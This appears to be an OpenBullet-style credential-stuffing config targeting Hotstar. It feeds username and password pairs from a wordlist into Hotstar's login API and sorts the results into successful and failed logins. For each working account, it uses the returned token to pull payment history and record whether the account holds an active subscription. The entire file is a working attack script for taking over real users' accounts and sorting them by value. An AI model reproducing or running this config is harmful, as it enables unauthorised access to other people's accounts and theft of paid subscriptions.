[SETTINGS]
{
  "Name": "HotStar",
  "SuggestedBots": 1,
  "LastModified": "2019-04-15T00:29:25.0363445-05:00",
  "AdditionalInfo": "",
  "Author": "FFaez1267",
  "Version": "1.0.1",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://api.hotstar.com/in/aadhar/v2/web/in/user/login" 
  CONTENT "{\"isProfileRequired\":false,\"userData\":{\"deviceId\":\"90c6a116-fad5-408e-a149-dc5d619d7a8b\",\"pId\":\"88eb526748d34ceb896e59e52928169b\",\"password\":\"<PASS>\",\"username\":\"<USER>\",\"usertype\":\"email\"},\"verification\":{}}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Login Success\",\"" 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "{\"description\":{\"" 

PARSE "<SOURCE>" JSON "userIdentity" -> VAR "TOKEN" 

REQUEST GET "https://api.hotstar.com/in/gringotts/v2/web/in/payment/history" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 
  HEADER "userId: <TOKEN>" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "\":{\"activeSubs\":[],\"" 

PARSE "<SOURCE>" LR "activeSubs\":[" "],\"" -> CAP "Active Sub" 

